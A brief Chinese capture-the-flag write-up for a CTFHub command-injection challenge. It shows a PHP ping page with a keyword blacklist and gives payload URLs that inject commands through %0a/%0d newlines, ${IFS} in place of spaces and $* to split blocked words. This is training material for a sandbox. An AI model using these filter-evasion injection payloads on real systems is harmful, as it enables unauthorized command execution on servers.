CTFHub 技能书 综合过滤
打开题目,源码已经出现了
<?php
$res = FALSE;
if (isset($_GET['ip']) && $_GET['ip']) {
$ip = $_GET['ip'];
$m = [];
if (!preg_match_all("/(\||&|;| |\/|cat|flag|ctfhub)/", $ip, $m)) {
$cmd = "ping -c 4 {$ip}";
exec($cmd, $res);
} else {
$res = $m;
}
}
?>
但是没有过滤%0a,%0d,用${IFS}
取代空格,用$*
绕过关键词过滤,因为在没有定义的情况下,$*
在shell命令执行下为空
url编码中,%0a是换行符,%0d是回车符,可以用这两个进行命令拼接。
payload:http://challenge-c09fc6a8b681c5d6.sandbox.ctfhub.com:10080/?ip=127.0.0.1%0als#
回显有一个flag_is_here文件夹
payload:http://challenge-c09fc6a8b681c5d6.sandbox.ctfhub.com:10080/?ip=127.0.0.1%0D%0Acd${IFS}fl$*ag_is_here%0als#
这里ls
是对flag_is_here目录进行操作,所有ls 是在cd flag_is_here执行后在flag_is_here目录下执行,这里拼接的就得用%0a换行符,可以等效&&,不能用%0d,%0d等效于&。回显flag文件,用cat
查看源码得到flag